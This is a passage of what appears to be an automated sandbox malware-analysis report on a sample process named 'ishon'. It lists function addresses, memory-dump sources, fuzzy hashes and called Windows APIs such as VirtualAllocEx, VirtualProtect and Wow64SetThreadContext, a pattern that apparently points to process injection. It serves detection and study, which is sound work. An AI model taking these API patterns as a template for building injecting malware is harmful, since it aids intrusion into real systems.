                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 66c0aeee2e804638065c693b7bc66568804b4bb6568632be7c758dad3f16d766
                                                                          • Instruction ID: 0971350660d248f31648d43061c9a8864124080023a44b08456ffdcf61319f89
                                                                          • Opcode Fuzzy Hash: 66c0aeee2e804638065c693b7bc66568804b4bb6568632be7c758dad3f16d766
                                                                          • Instruction Fuzzy Hash: 602145B18002599FDF10DFAAC841AEEBFF5FF48310F50842AE919A7250CB399955DBA4
                                                                          Function 07629731 Relevance: 1.6, APIs: 1, Instructions: 64memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 076297AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521371739.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7620000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 609a76825bfa90af2b2cafacccb4617bf1636a762390377e132dfcfb02602f99
                                                                          • Instruction ID: de4c924fe81f46aafcd5c8ba2ad673cb3a5d6d35e8790ebbbc4b58ed8b0fa6d9
                                                                          • Opcode Fuzzy Hash: 609a76825bfa90af2b2cafacccb4617bf1636a762390377e132dfcfb02602f99
                                                                          • Instruction Fuzzy Hash: AE2137B19002099EDB10DFAAC440AEEFBF5FF88320F50842AD419A7240CB78A5458FA1
                                                                          Function 0769E518 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0769E596
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: 02c5e85fffcbd1af4cfb4a77937c63182f78828701801ccb7a81e846c17599c6
                                                                          • Instruction ID: 44ef931d27a1d0bc31afb4764cc021ed6051dce937c22e271b4601b359b145d9
                                                                          • Opcode Fuzzy Hash: 02c5e85fffcbd1af4cfb4a77937c63182f78828701801ccb7a81e846c17599c6
                                                                          • Instruction Fuzzy Hash: 962138B1D003099FDB10DFAAC4857EEBBF4EF48324F508429D419A7240DB799945CFA4
                                                                          Function 076286AA Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521371739.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7620000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: ae0d8989b7b833e5a00c1b8b543b97f426d9b1b9e01adab330ae8318bc81a04b
                                                                          • Instruction ID: ae79ab568cb2ea3b2170853c2c60a57f1e4f404bf773eef5cb887406e836da37
                                                                          • Opcode Fuzzy Hash: ae0d8989b7b833e5a00c1b8b543b97f426d9b1b9e01adab330ae8318bc81a04b
                                                                          • Instruction Fuzzy Hash: 5F119DB58002198BCB10DFAAC8447EEFFF8EF48324F10841AD45AA7240CA399985CFA4
                                                                          Function 07629738 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 076297AC
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521371739.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7620000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID:
                                                                          • API String ID: 544645111-0
                                                                          • Opcode ID: 44e8be6e291ecb5782810d333bef61124b03eb2c76e4feda3a58af02925aea6e
                                                                          • Instruction ID: d45287c7c0ea3858e426e99d3d442a117f9c8304aa79ae562c03f5009675b8df
                                                                          • Opcode Fuzzy Hash: 44e8be6e291ecb5782810d333bef61124b03eb2c76e4feda3a58af02925aea6e
                                                                          • Instruction Fuzzy Hash: 4D2104B18002099EDB10DFAAC444AAEBBF5EF88320F508429D459A7240CB79A9458FA1
                                                                          Function 0769EB18 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0769EB8E
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 96efd17d4a2655ca50aa396424c6154d43d9a47044f2d2678d1c2309f671f1aa
                                                                          • Instruction ID: 2e5733247ad031c3c6295b421e9b812fda1f6ae001c2ef1eee6559af932cc32f
                                                                          • Opcode Fuzzy Hash: 96efd17d4a2655ca50aa396424c6154d43d9a47044f2d2678d1c2309f671f1aa
                                                                          • Instruction Fuzzy Hash: 431129B58002499FCF10DFA9C844AEEBFF5FF48314F108819E55AA7250C7799544CFA1
                                                                          Function 076286B0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521371739.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7620000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: ec195cc546bd54ae12a3fe5d24507cfc221eb9e4fcfd4910f0ff06c4c98c4c57
                                                                          • Instruction ID: 24626bf2863c450d4f3b00273fdb4bce097be123a33670db1b089e76f0881172
                                                                          • Opcode Fuzzy Hash: ec195cc546bd54ae12a3fe5d24507cfc221eb9e4fcfd4910f0ff06c4c98c4c57
                                                                          • Instruction Fuzzy Hash: A1113AB19002598ADB10DFAAC8447EEFFF9AF48314F14841AD459A7240CA39A945CBA4
                                                                          Function 0769EB20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0769EB8E
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2521533003.0000000007690000.00000040.00000800.00020000.00000000.sdmp, Offset: 07690000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7690000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 64ff4c1760f09d9d03cb5b7b972be6050c0c255c68d3f67d61c715444b63c796
                                                                          • Instruction ID: 71ef5d4ac90e571bd8d69b6c6654397daf1ee5f298e2db9bb4c3576fbc2a9cc5
                                                                          • Opcode Fuzzy Hash: 64ff4c1760f09d9d03cb5b7b972be6050c0c255c68d3f67d61c715444b63c796
                                                                          • Instruction Fuzzy Hash: 221137B68002499FCF10DFAAC844AEEBFF5FF48324F108819E51AA7250C779A544CFA1
                                                                          Function 075F7F08 Relevance: 1.5, Strings: 1, Instructions: 227COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520755423.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_75f0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          • API String ID: 0-1259897404
                                                                          • Opcode ID: cc2183e15c168cad81188b57c62bba24ce5919a75e9ddfd01c22d77aa4433296
                                                                          • Instruction ID: 4a15cc1f0bf30ea563251d0bec7cb3acc99421de51344ec1a175048f102aedd8
                                                                          • Opcode Fuzzy Hash: cc2183e15c168cad81188b57c62bba24ce5919a75e9ddfd01c22d77aa4433296
                                                                          • Instruction Fuzzy Hash: DDA11C74A10219DFCB08DFA4D898ADDBBB6FF88300F558559E505AB364DB70AC42CF91
                                                                          Function 074CE490 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: paq
                                                                          • API String ID: 0-3273118895
                                                                          • Opcode ID: f6c8333570e69140eacd01000b7f1e4752d7cc2721e7ec4a2f706245e2de2fa2
                                                                          • Instruction ID: cdc2e6bd055018b1d669a1abce5c35dd328b1d2a97f78de882c4967c35fc62a1
                                                                          • Opcode Fuzzy Hash: f6c8333570e69140eacd01000b7f1e4752d7cc2721e7ec4a2f706245e2de2fa2
                                                                          • Instruction Fuzzy Hash: BE514A76640100AFCB459FA8D944D697FF6FF8C3147168499E2098B372DB36DC22EB91
                                                                          Function 074CF4A2 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          • API String ID: 0-600464949
                                                                          • Opcode ID: ffe98fb089ba91cbea73bb9a6c2347336aa63ac6c9f98ba6a15c373f435d01d4
                                                                          • Instruction ID: b4be936f8ec97b935ffdcc023f9b415d2bb9ae54f67d27fa5eafa7ff1a178de0
                                                                          • Opcode Fuzzy Hash: ffe98fb089ba91cbea73bb9a6c2347336aa63ac6c9f98ba6a15c373f435d01d4
                                                                          • Instruction Fuzzy Hash: 0241C476A00516CFCB00CF68C484AAAFBB5FF45320F16859AD6159B392C734F956CBD0
                                                                          Function 074CE938 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          • API String ID: 0-600464949
                                                                          • Opcode ID: b292b0953df6abefa48b7185047cac44e50bec717793f1d07ec099c7aaf89dbd
                                                                          • Instruction ID: 0fd4cb978b2883e0a0ce3b26bf604a2939fb4d6cd55e44f12c7a48c146d59f56
                                                                          • Opcode Fuzzy Hash: b292b0953df6abefa48b7185047cac44e50bec717793f1d07ec099c7aaf89dbd
                                                                          • Instruction Fuzzy Hash: 1A212B793001166FD7159E69D8509EFBFA6EFC9320B50403AE908C7364DF729C16C7A0
                                                                          Function 074CBF70 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: kRA
                                                                          • API String ID: 0-3334018834
                                                                          • Opcode ID: d013600ef04f00d189b45b51965aebe00995076d6a63294bf2a5594142d7c298
                                                                          • Instruction ID: e226f4cc9e2fe9c545631fb16660b1c8c3cecccae4a826a440f16f199ec2dd63
                                                                          • Opcode Fuzzy Hash: d013600ef04f00d189b45b51965aebe00995076d6a63294bf2a5594142d7c298
                                                                          • Instruction Fuzzy Hash: 4A3127B8E04209CFDB44DFAAD5816EEBBF6FB89301F50846AD404A7355D7385982CFA1
                                                                          Function 074CBF80 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: kRA
                                                                          • API String ID: 0-3334018834
                                                                          • Opcode ID: 01935031ea9b941f41ec2ad21001b495489bd082c0084dcd94bfb82085b2b394
                                                                          • Instruction ID: acfb88cf70bb55e55cacb10296675919e48ef8d5a9a7715633591944470b107b
                                                                          • Opcode Fuzzy Hash: 01935031ea9b941f41ec2ad21001b495489bd082c0084dcd94bfb82085b2b394
                                                                          • Instruction Fuzzy Hash: 753116B8E04109CBDB44DFAAC4816EEBBF6FB89301F50946AD805A3344D7389981CFA1
                                                                          Function 07481EA3 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520478626.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7480000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          • API String ID: 0-1259897404
                                                                          • Opcode ID: 2a82aacb7504b08543b5c0d45fbe6b16fcc0ae78dae8e07e312cc06e1ff28ee7
                                                                          • Instruction ID: e124bf6165bb46caf2ef87807dc7f63b18d753da8d02143ded15bf9575dc92b5
                                                                          • Opcode Fuzzy Hash: 2a82aacb7504b08543b5c0d45fbe6b16fcc0ae78dae8e07e312cc06e1ff28ee7
                                                                          • Instruction Fuzzy Hash: 1821E2B4E0020ECFDB58EBA9D4446FEBBB1BB85301F50856BD511A7250CB745A46CF91
                                                                          Function 074910A8 Relevance: 1.3, APIs: 1, Instructions: 56memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 0749111B
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520513400.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7490000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 0e85ea6384e0a8f57a5385c0d099f77676e8a929ec2d7918e14fc99ecd1f5485
                                                                          • Instruction ID: fde716629e75626bdaceadca5b57539192b1043bcfacff0c9d467058053d8379
                                                                          • Opcode Fuzzy Hash: 0e85ea6384e0a8f57a5385c0d099f77676e8a929ec2d7918e14fc99ecd1f5485
                                                                          • Instruction Fuzzy Hash: CE1129B59002099FCB10DFAAC845AEEFFF5EF88320F24841AD559A7250C7799545CFA1
                                                                          Function 074910B0 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 0749111B
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520513400.0000000007490000.00000040.00000800.00020000.00000000.sdmp, Offset: 07490000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7490000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 512edd85f8e45212eeca55b92a19886553a0ebe6ba672a7ba253a40389e5ce34
                                                                          • Instruction ID: c362c7614206e4193034b8dced8dd455a34817730b11e2b9e46348f4b3086903
                                                                          • Opcode Fuzzy Hash: 512edd85f8e45212eeca55b92a19886553a0ebe6ba672a7ba253a40389e5ce34
                                                                          • Instruction Fuzzy Hash: 9B1137B59002099FCB10DFAAC845AEEFFF5EF48310F10841AD519A7250C779A544CFA0
                                                                          Function 074C4D74 Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %
                                                                          • API String ID: 0-2567322570
                                                                          • Opcode ID: cbf8926ab727c132d5e5b6707a460aad64749d6630730cff9915317452184e1a
                                                                          • Instruction ID: 7aceadc797308ecc05e0172a65e0bc38002c93218cb423d112ee845ed764b046
                                                                          • Opcode Fuzzy Hash: cbf8926ab727c132d5e5b6707a460aad64749d6630730cff9915317452184e1a
                                                                          • Instruction Fuzzy Hash: 7F11C2B49006A8CFEBA4DF29ED9879EBBB5BB05306F0041DAD409A2244C7784AC8CF15
                                                                          Function 074CB5B5 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: ad4d80c8401b1d91fa2301bf0398e156968fd7347dcee318aeb75614c272c3cb
                                                                          • Instruction ID: daab0b87cd323097aa2351a0f7ba7f9166c5f37e72f1dda5dbf0c9c1ad738f76
                                                                          • Opcode Fuzzy Hash: ad4d80c8401b1d91fa2301bf0398e156968fd7347dcee318aeb75614c272c3cb
                                                                          • Instruction Fuzzy Hash: D1F0D478A002188BCB90DF98C884B99BBB1FB88311F50509A9409B3344CA345EC5CF20
                                                                          Function 074CF7A8 Relevance: .3, Instructions: 267COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 507405fa4a3538ce5758596a74c84db2e19ba884b731d39234f7ef37fff7c397
                                                                          • Instruction ID: d9b323aa4d4729eec431b7dd5ea0a7821beeb1693851e74a149c54244ad1d4c9
                                                                          • Opcode Fuzzy Hash: 507405fa4a3538ce5758596a74c84db2e19ba884b731d39234f7ef37fff7c397
                                                                          • Instruction Fuzzy Hash: BDA19C7AB012159FCB14CFA5D554AEEBBB2FF88311F15806AE801AB390CB79DD45CB60
                                                                          Function 074C3E20 Relevance: .1, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4e5b4fb5203261f2142bdc3814c51313fad124e30f69dcbc75aaf705cbeb77d8
                                                                          • Instruction ID: ec0598111371ff0922031f90331c66a207f755568469178d39c3dc8bbc282c4c
                                                                          • Opcode Fuzzy Hash: 4e5b4fb5203261f2142bdc3814c51313fad124e30f69dcbc75aaf705cbeb77d8
                                                                          • Instruction Fuzzy Hash: 7051D3B4E01209DFDB58DFAAD594ADDBBB2FF89304F20842EE405AB251DB309946CF51
                                                                          Function 074CAA70 Relevance: .1, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ca3cef996f626f680f59393477267387d88ac73e5775f2c6d138ce568d184474
                                                                          • Instruction ID: 1da7b0c835f73fc3674393053a255c8a0609b7bca6865da3f27a36d1f581345b
                                                                          • Opcode Fuzzy Hash: ca3cef996f626f680f59393477267387d88ac73e5775f2c6d138ce568d184474
                                                                          • Instruction Fuzzy Hash: EE4103B4E00209CFDB44CFAAD944AEEBBF2BB89300F14D46AE405A7351D7769945CF90
                                                                          Function 074CB3FB Relevance: .1, Instructions: 94COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 09a47f5a9f8c0e7b69e607cd44792b5f623f6a7f99c74f61014481a65a2a55d1
                                                                          • Instruction ID: b102fbc20f25ab4bf19fb26c52c08770a723de222d0c701495e544f3c09164c2
                                                                          • Opcode Fuzzy Hash: 09a47f5a9f8c0e7b69e607cd44792b5f623f6a7f99c74f61014481a65a2a55d1
                                                                          • Instruction Fuzzy Hash: 514118F8949218CFDB90DF99C985BEABBF2FB8A301F50A05AC405AB245C3749D85CF05
                                                                          Function 074CBA0B Relevance: .1, Instructions: 93COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ce3b1d683eb2e6083afcffa5134380049ce1fcb4e4995eacc7cca2ea6c1f5e34
                                                                          • Instruction ID: 602014127356d687429c6728fe9f7fa448be8c6c2c4fb38938b9b2541dfeb8e7
                                                                          • Opcode Fuzzy Hash: ce3b1d683eb2e6083afcffa5134380049ce1fcb4e4995eacc7cca2ea6c1f5e34
                                                                          • Instruction Fuzzy Hash: 0B41D3B4900219CFDB94DFA4D989BEABBB2FB4A705F5090AAD449A3340DB385DC4CF50
                                                                          Function 074CAA80 Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1fdaf5b19138a3949197642e47179b621c01d1fad51cba627709901caf476647
                                                                          • Instruction ID: b884829983e7a8d2d84062ae4ffa7e965dc6a0be6308952580591eb2e52fa408
                                                                          • Opcode Fuzzy Hash: 1fdaf5b19138a3949197642e47179b621c01d1fad51cba627709901caf476647
                                                                          • Instruction Fuzzy Hash: 213102B8E00209CFDB44CFAAC644AEEBBF2BB89300F14D46AE415A7350D7769941CF90
                                                                          Function 074CB0F0 Relevance: .1, Instructions: 91COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 94f906281bb4eae277a0cda50a6cb61570f607f9546de8174fd0a5406f0ca7cf
                                                                          • Instruction ID: 1560639ef116fa9d70c359d5a68225b9260fafabc9918bd55f00eb9941e8bdda
                                                                          • Opcode Fuzzy Hash: 94f906281bb4eae277a0cda50a6cb61570f607f9546de8174fd0a5406f0ca7cf
                                                                          • Instruction Fuzzy Hash: 814135B8900208CFDB94DF65D986BEEBBB2FB4A301F4090AAD548A7341DB345D84CF41
                                                                          Function 074CA910 Relevance: .1, Instructions: 87COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 84aa92c2861cf9bdfb3dc84543f19e7009814b25bba6ab8859a81905e8e989f7
                                                                          • Instruction ID: 2427b004c345035670f25f84dc820a7c4f4d181081dd639a2f21b49f3df64628
                                                                          • Opcode Fuzzy Hash: 84aa92c2861cf9bdfb3dc84543f19e7009814b25bba6ab8859a81905e8e989f7
                                                                          • Instruction Fuzzy Hash: 43313675E002099FCB05DFA9D850AEEBBB6FF89310F00846AE405AB264DA349945CFA1
                                                                          Function 074CB0E0 Relevance: .1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e70ee416cee0281307c7e6893c3d62b0a6b74f361e7c5b6ee4a5093fb663191b
                                                                          • Instruction ID: 36a2af5113e37d10946383d50934f2911a8432e9b624389e270f9eff7154b70c
                                                                          • Opcode Fuzzy Hash: e70ee416cee0281307c7e6893c3d62b0a6b74f361e7c5b6ee4a5093fb663191b
                                                                          • Instruction Fuzzy Hash: C0315CF4910218DFDB94CF65D986BEEBBB2FB4A341F40509AD54867341DB345984CF41
                                                                          Function 012FD118 Relevance: .1, Instructions: 74COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2501967959.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_12fd000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4c1522b07f2b1e301d4f121c979b738754361806a57d8b98177f73b310bde395
                                                                          • Instruction ID: 060694aaa7b2a755bded39590477368bb376522fa4bdb293e3dc067bbfb3d77c
                                                                          • Opcode Fuzzy Hash: 4c1522b07f2b1e301d4f121c979b738754361806a57d8b98177f73b310bde395
                                                                          • Instruction Fuzzy Hash: 0F21FF715142099FDB05DF58D980B27FB65FB88310F20857DEA090B246C37AD40ACAA2
                                                                          Function 074CB92D Relevance: .1, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8cbfa8dcbeeec26e8f421ec883d962d257f6f7eefeabae3d1d4fc38e164e44d7
                                                                          • Instruction ID: 466b5132ad5747bc3f545655f63a18e756c5824e51c8867c2372865fa86e665e
                                                                          • Opcode Fuzzy Hash: 8cbfa8dcbeeec26e8f421ec883d962d257f6f7eefeabae3d1d4fc38e164e44d7
                                                                          • Instruction Fuzzy Hash: C231E1B4900208CFEB94DFA4D889BDDBBB2FB4A745F50509AD449A7380DB385D85CF51
